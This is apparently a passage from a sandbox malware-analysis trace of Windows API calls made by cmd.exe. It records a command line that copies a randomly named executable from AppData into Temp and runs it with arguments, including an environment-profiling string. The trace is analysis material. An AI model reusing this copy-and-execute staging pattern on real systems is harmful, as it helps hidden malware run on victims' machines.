lpReserved=0x0, lpType=0x1ae9ac, lpData=0x1ae9b0, lpcbData=0x1ae9a8*=0x1000 | out: lpType=0x1ae9ac*=0x4, lpData=0x1ae9b0*=0x0, lpcbData=0x1ae9a8*=0x4) returned 0x0 [0107.432] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1ae9ac, lpData=0x1ae9b0, lpcbData=0x1ae9a8*=0x1000 | out: lpType=0x1ae9ac*=0x4, lpData=0x1ae9b0*=0x40, lpcbData=0x1ae9a8*=0x4) returned 0x0 [0107.432] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1ae9ac, lpData=0x1ae9b0, lpcbData=0x1ae9a8*=0x1000 | out: lpType=0x1ae9ac*=0x4, lpData=0x1ae9b0*=0x40, lpcbData=0x1ae9a8*=0x4) returned 0x0 [0107.433] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1ae9ac, lpData=0x1ae9b0, lpcbData=0x1ae9a8*=0x1000 | out: lpType=0x1ae9ac*=0x0, lpData=0x1ae9b0*=0x40, lpcbData=0x1ae9a8*=0x1000) returned 0x2 [0107.433] RegCloseKey (hKey=0x40) returned 0x0 [0107.433] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1ae9a4 | out: phkResult=0x1ae9a4*=0x40) returned 0x0 [0107.433] RegQueryValueExW (in: 
hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1ae9ac, lpData=0x1ae9b0, lpcbData=0x1ae9a8*=0x1000 | out: lpType=0x1ae9ac*=0x0, lpData=0x1ae9b0*=0x40, lpcbData=0x1ae9a8*=0x1000) returned 0x2 [0107.433] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1ae9ac, lpData=0x1ae9b0, lpcbData=0x1ae9a8*=0x1000 | out: lpType=0x1ae9ac*=0x4, lpData=0x1ae9b0*=0x1, lpcbData=0x1ae9a8*=0x4) returned 0x0 [0107.433] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1ae9ac, lpData=0x1ae9b0, lpcbData=0x1ae9a8*=0x1000 | out: lpType=0x1ae9ac*=0x0, lpData=0x1ae9b0*=0x1, lpcbData=0x1ae9a8*=0x1000) returned 0x2 [0107.433] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1ae9ac, lpData=0x1ae9b0, lpcbData=0x1ae9a8*=0x1000 | out: lpType=0x1ae9ac*=0x4, lpData=0x1ae9b0*=0x0, lpcbData=0x1ae9a8*=0x4) returned 0x0 [0107.433] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1ae9ac, lpData=0x1ae9b0, lpcbData=0x1ae9a8*=0x1000 | out: lpType=0x1ae9ac*=0x4, lpData=0x1ae9b0*=0x9, lpcbData=0x1ae9a8*=0x4) returned 0x0 [0107.433] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1ae9ac, lpData=0x1ae9b0, lpcbData=0x1ae9a8*=0x1000 | out: lpType=0x1ae9ac*=0x4, lpData=0x1ae9b0*=0x9, lpcbData=0x1ae9a8*=0x4) returned 0x0 [0107.433] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1ae9ac, lpData=0x1ae9b0, lpcbData=0x1ae9a8*=0x1000 | out: lpType=0x1ae9ac*=0x0, lpData=0x1ae9b0*=0x9, lpcbData=0x1ae9a8*=0x1000) returned 0x2 [0107.433] RegCloseKey (hKey=0x40) returned 0x0 [0107.433] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886354 [0107.433] srand (_Seed=0x5b886354) [0107.433] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > 
\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\F8a3iwA6.exe\" && \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\F8a3iwA6.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"WIN_6.1_32|ADMIN_YES|INT_4\" \"60000\"" [0107.433] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\F8a3iwA6.exe\" && \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\F8a3iwA6.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"WIN_6.1_32|ADMIN_YES|INT_4\" \"60000\"" [0107.434] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4aa45260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0107.434] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1e1b10, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0107.434] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4aa50640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0107.434] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4aa50640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0107.434] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4aa50640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0107.435] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0107.435] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0107.435] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0107.435] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0107.435] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0107.435] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0107.435] _wcsicmp (_String1="PROMPT", _String2="RANDOM") 
returned -2 [0107.435] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0107.435] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0107.435] GetEnvironmentStringsW () returned 0x1e2500* [0107.435] FreeEnvironmentStringsW (penv=0x1e2500) returned 1 [0107.435] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4aa50640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0107.435] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4aa50640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0107.435] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0107.435] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0107.436] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0107.436] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0107.436] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0107.436] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0107.436] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0107.436] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0107.436] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1af770 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0107.436] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x1af770, lpFilePart=0x1af76c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x1af76c*="Desktop") returned 0x18 [0107.436] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0107.436] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1af4ec | out: lpFindFileData=0x1af4ec) returned 0x1e0b90 [0107.437] FindClose (in: hFindFile=0x1e0b90 | out: hFindFile=0x1e0b90) returned 1 [0107.437] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x1af4ec | out: lpFindFileData=0x1af4ec) returned 0x1e0b90 [0107.437] 
FindClose (in: hFindFile=0x1e0b90 | out: hFindFile=0x1e0b90) returned 1 [0107.437] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x1af4ec | out: lpFindFileData=0x1af4ec) returned 0x1e0b90 [0107.437] FindClose (in: hFindFile=0x1e0b90 | out: hFindFile=0x1e0b90) returned 1 [0107.437] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0107.437] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0107.437] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0107.437] GetEnvironmentStringsW () returned 0x1e03b0* [0107.437] FreeEnvironmentStringsW (penv=0x1e03b0) returned 1 [0107.437] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4aa45260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0107.438] GetConsoleOutputCP () returned 0x1b5 [0107.438] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4aa44260 | out: lpCPInfo=0x4aa44260) returned 1 [0107.438] GetUserDefaultLCID () returned 0x409 [0107.438] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4aa44950, cchData=8 | out: lpLCData=":") returned 2 [0107.438] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1af8b0, cchData=128 | out: lpLCData="0") returned 2 [0107.438] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1af8b0, cchData=128 | out: lpLCData="0") returned 2 [0107.438] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1af8b0, cchData=128 | out: lpLCData="1") returned 2 [0107.438] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4aa44940, cchData=8 | out: lpLCData="/") returned 2 [0107.438] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4aa44d80, cchData=32 | out: lpLCData="Mon") returned 4 [0107.439] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4aa44d40, cchData=32 | out: lpLCData="Tue") returned 4 [0107.439] GetLocaleInfoW 
(in: Locale=0x409, LCType=0x33, lpLCData=0x4aa44d00, cchData=32 | out: lpLCData="Wed") returned 4 [0107.439] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4aa44cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0107.439] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4aa44c80, cchData=32 | out: lpLCData="Fri") returned 4 [0107.439] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4aa44c40, cchData=32 | out: lpLCData="Sat") returned 4 [0107.439] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4aa44c00, cchData=32 | out: lpLCData="Sun") returned 4 [0107.439] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4aa44930, cchData=8 | out: lpLCData=".") returned 2 [0107.439] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4aa44920, cchData=8 | out: lpLCData=",") returned 2 [0107.439] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0107.440] GetConsoleTitleW (in: lpConsoleTitle=0x1d0a28, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0107.503] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0107.503] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0107.503] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0107.503] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0107.504] _wcsicmp (_String1="type", _String2=")") returned 75 [0107.504] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0107.504] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0107.504] _wcsicmp (_String1="IF", _String2="type") returned -11 [0107.504] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0107.504] _wcsicmp (_String1="REM", _String2="type") returned -2 [0107.504] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0107.508] _wcsicmp (_String1="FOR", 
_String2="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\F8a3iwA6.exe\"") returned 68 [0107.508] _wcsicmp (_String1="FOR/?", _String2="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\F8a3iwA6.exe\"") returned 68 [0107.508] _wcsicmp (_String1="IF", _String2="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\F8a3iwA6.exe\"") returned 71 [0107.508] _wcsicmp (_String1="IF/?", _String2="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\F8a3iwA6.exe\"") returned 71 [0107.508] _wcsicmp (_String1="REM", _String2="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\F8a3iwA6.exe\"") returned 80 [0107.508] _wcsicmp (_String1="REM/?", _String2="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\F8a3iwA6.exe\"") returned 80 [0107.510] _get_osfhandle (_FileHandle=1) returned 0x7 [0107.510] _get_osfhandle (_FileHandle=1) returned 0x7 [0107.510] _get_osfhandle (_FileHandle=1) returned 0x7 [0107.510] GetFileType (hFile=0x7) returned 0x2 [0107.510] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0107.510] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1af744 | out: lpMode=0x1af744) returned 1 [0107.511] _dup (_FileHandle=1) returned 3 [0107.511] _close (_FileHandle=1) returned 0 [0107.511] _wcsicmp (_String1="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\F8a3iwA6.exe", _String2="con") returned -53 [0107.511] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\F8a3iwA6.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\f8a3iwa6.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x1af714, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c [0107.512] _open_osfhandle (_OSFileHandle=0x4c, _Flags=8) returned 1 [0107.512] GetConsoleTitleW (in: lpConsoleTitle=0x1af544, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0107.512] _wcsicmp (_String1="type", _String2="DIR") returned 16 [0107.512] _wcsicmp (_String1="type", _String2="ERASE") returned 15 [0107.512] _wcsicmp (_String1="type", _String2="DEL") 
returned 16 [0107.512] _wcsicmp (_String1="type", _String2="TYPE") returned 0 [0107.512] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4aa45260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0107.513] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe", fInfoLevelId=0x1, lpFindFileData=0x1af0a8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1af0a8) returned 0x1e2030 [0107.513] _wcsicmp (_String1="XEY8d7zI.exe", _String2=".") returned 74 [0107.513] _wcsicmp (_String1="XEY8d7zI.exe", _String2="..") returned 74 [0107.513] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfcce~1\\xey8d7zi.exe")) returned 0x2020 [0107.513] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfcce~1\\xey8d7zi.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x1adfb4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0107.513] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 4 [0107.513] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.513] GetFileType (hFile=0x54) returned 0x1 [0107.513] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.513] GetFileSize (in: hFile=0x54, lpFileSizeHigh=0x1ae00c | out: lpFileSizeHigh=0x1ae00c*=0x0) returned 0x7d600 [0107.513] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.513] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.513] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.513] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 
[0107.514] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.514] GetFileType (hFile=0x4c) returned 0x1 [0107.514] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.514] GetFileType (hFile=0x4c) returned 0x1 [0107.514] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.514] WriteFile (in: hFile=0x4c, lpBuffer=0x1aee44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.515] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.515] GetFileType (hFile=0x4c) returned 0x1 [0107.515] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.515] WriteFile (in: hFile=0x4c, lpBuffer=0x1aee94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aee94*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.515] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.515] GetFileType (hFile=0x4c) returned 0x1 [0107.515] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.515] WriteFile (in: hFile=0x4c, lpBuffer=0x1aeee4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aeee4*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.515] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.515] GetFileType (hFile=0x4c) returned 0x1 [0107.515] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.515] WriteFile (in: hFile=0x4c, lpBuffer=0x1aef34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aef34*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.515] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.515] GetFileType (hFile=0x4c) returned 0x1 [0107.515] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.515] WriteFile (in: hFile=0x4c, lpBuffer=0x1aef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aef84*, 
lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.515] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.515] GetFileType (hFile=0x4c) returned 0x1 [0107.515] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.515] WriteFile (in: hFile=0x4c, lpBuffer=0x1aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aefd4*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.515] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.515] GetFileType (hFile=0x4c) returned 0x1 [0107.515] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.515] WriteFile (in: hFile=0x4c, lpBuffer=0x1af024*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1af024*, lpNumberOfBytesWritten=0x1ae028*=0x20, lpOverlapped=0x0) returned 1 [0107.515] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.515] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.515] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.516] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.516] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.516] GetFileType (hFile=0x4c) returned 0x1 [0107.516] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.516] GetFileType (hFile=0x4c) returned 0x1 [0107.516] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.516] WriteFile (in: hFile=0x4c, lpBuffer=0x1aee44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.516] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.516] GetFileType (hFile=0x4c) returned 0x1 [0107.516] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0107.516] WriteFile (in: hFile=0x4c, lpBuffer=0x1aee94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aee94*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.516] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.516] GetFileType (hFile=0x4c) returned 0x1 [0107.516] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.516] WriteFile (in: hFile=0x4c, lpBuffer=0x1aeee4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aeee4*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.516] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.516] GetFileType (hFile=0x4c) returned 0x1 [0107.516] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.516] WriteFile (in: hFile=0x4c, lpBuffer=0x1aef34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aef34*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.516] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.516] GetFileType (hFile=0x4c) returned 0x1 [0107.516] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.516] WriteFile (in: hFile=0x4c, lpBuffer=0x1aef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aef84*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.516] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.516] GetFileType (hFile=0x4c) returned 0x1 [0107.516] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.516] WriteFile (in: hFile=0x4c, lpBuffer=0x1aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aefd4*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.516] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.516] GetFileType (hFile=0x4c) returned 0x1 [0107.516] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.517] WriteFile (in: hFile=0x4c, 
lpBuffer=0x1af024*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1af024*, lpNumberOfBytesWritten=0x1ae028*=0x20, lpOverlapped=0x0) returned 1 [0107.517] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.517] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae014 | out: lpNewFilePointer=0x0) returned 1 [0107.517] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.517] ReadFile (in: hFile=0x54, lpBuffer=0x1aee44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae034, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesRead=0x1ae034*=0x200, lpOverlapped=0x0) returned 1 [0107.517] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.517] GetFileType (hFile=0x4c) returned 0x1 [0107.517] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.517] GetFileType (hFile=0x4c) returned 0x1 [0107.517] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.517] WriteFile (in: hFile=0x4c, lpBuffer=0x1aee44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aee44*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.517] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.517] GetFileType (hFile=0x4c) returned 0x1 [0107.517] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.517] WriteFile (in: hFile=0x4c, lpBuffer=0x1aee94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aee94*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.517] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.517] GetFileType (hFile=0x4c) returned 0x1 [0107.517] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.517] WriteFile (in: hFile=0x4c, lpBuffer=0x1aeee4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aeee4*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.517] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0107.517] GetFileType (hFile=0x4c) returned 0x1 [0107.517] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.517] WriteFile (in: hFile=0x4c, lpBuffer=0x1aef34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aef34*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.517] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.517] GetFileType (hFile=0x4c) returned 0x1 [0107.517] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.517] WriteFile (in: hFile=0x4c, lpBuffer=0x1aef84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aef84*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.517] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.517] GetFileType (hFile=0x4c) returned 0x1 [0107.517] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.517] WriteFile (in: hFile=0x4c, lpBuffer=0x1aefd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae028, lpOverlapped=0x0 | out: lpBuffer=0x1aefd4*, lpNumberOfBytesWritten=0x1ae028*=0x50, lpOverlapped=0x0) returned 1 [0107.517] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.517] GetFileType (hFile=0x4c) returned 0x1 [0107.517] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.518] WriteFile (in: hFile=0x4c, lpBuffer=0x1af024*, nNumberOfBytesToWrite=0x20, 